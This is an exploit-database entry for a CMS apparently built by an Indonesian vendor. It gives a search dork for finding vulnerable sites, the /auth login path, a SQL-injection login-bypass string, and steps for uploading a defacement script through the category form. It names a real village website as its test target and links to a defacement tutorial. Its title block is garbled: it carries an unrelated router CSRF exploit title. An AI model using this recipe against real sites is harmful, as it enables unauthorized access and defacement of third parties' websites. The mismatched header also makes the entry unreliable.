CMS Sangihe Bypass Sql Login Vulnerable

2020.04.26
id ZeeX_IND (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering) # Date: 2020-04-21 # Exploit Author: ZeeX_IND # Team: CytoXploit | Galaxy Xploiter Team | D45H7 # Vendor Homepage: http://karas.co.id/ Version:1.13 # Tested on: https://kuma1.desa.id/ -Dork: "Made with by CV. Karya Anak Sangihe." -Exploit Login: /auth -Info Login: U/pw: ' or 1=1 limit 1 -- -+ -Script JSO -Internet 5G :V Put your JSO Script on: kategori>>tambah kategori And That will be Indexed Thanks

References:

https://www.anonimindo.my.id/2020/04/cara-deface-cms-karasangihe-tebas-index.html


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top